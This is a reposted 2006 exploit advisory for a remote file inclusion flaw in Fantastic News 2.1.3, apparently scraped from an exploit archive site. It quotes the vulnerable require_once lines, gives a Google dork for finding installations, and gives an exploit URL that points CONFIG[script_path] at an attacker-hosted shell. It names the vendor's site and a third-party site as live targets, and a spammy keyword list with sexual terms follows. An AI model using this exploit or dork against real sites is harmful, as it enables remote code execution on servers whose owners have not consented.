about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Fantastic News <= 2.1.3 (script_path) Remote File Include Vulnerability




2006-08-19 Fantastic News <= 2.1.3 (script_path) Remote File Include Vulnerability
Rated as : Moderate Risk

#==============================================================================================
#Fantastic News <= v2.1.3 (CONFIG[script_path]) Remote File Inclusion
Exploit
#===============================================================================================
#                                                                         
  
#Critical Level : Dangerous                                               
  
#                                                                         
  
#Venedor site : http://fscripts.com/              
#                                                                         
    
#Version : v2.1.2 & v2.1.3                                                
 
#                                                                
#================================================================================================
#
#Dork : "Powered by Fantastic News v2.1.2" or "Powered by
Fantastic News v2.1.3"
#
#================================================================================================
#
#Bug in : news.php
#
#Vlu Code :
#--------------------------------
#  require_once($CONFIG['script_path']."config.php");
# 
require_once($CONFIG['script_path']."functions/functions.php");
#  require_once($CONFIG['script_path']."functions/mysql.php");
# 
require_once($CONFIG['script_path']."functions/template.php");
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script
Path]/news.php?CONFIG[script_path]=http://SHELLURL.COM?
#
#Example :
#   http://fscripts.com/ ====> vendor site =)) hahahahaaaaaa ====>  
 2.1.3
#   http://lnx.evanescencewebsite.com/PressArchive  =====>    2.1.2
#
#
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : Str0ke XoRon Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf)
==================================================================================================
securitydot.net - 2006-08-19

Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 20:42:55 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
oregondono www.goskat www.jockey Free 3x .c TRANSE.FRE Ulead Vide www.pbxoa. Blufilim.c PHP Arena vocal sex sexxxxx [url= http SRILANKAN Vidio anak seleb www.trish swat 4crac parachromi google sex view.php/* parachromi 1 union se news for c Crack Data desimammy. photojp katrinaka php-nuke 2 www.lexsen www.thamil Spy-H indian nud 18sexy vid www.lexsen sexedforev Www.touchg www.jt.lvs http:/fask familysex. 200 /compo Free sex v putty .58 www.sex.na SEXCY bbs.wence. www.groups 123 www.cq386. www.seyx.c www.g617.b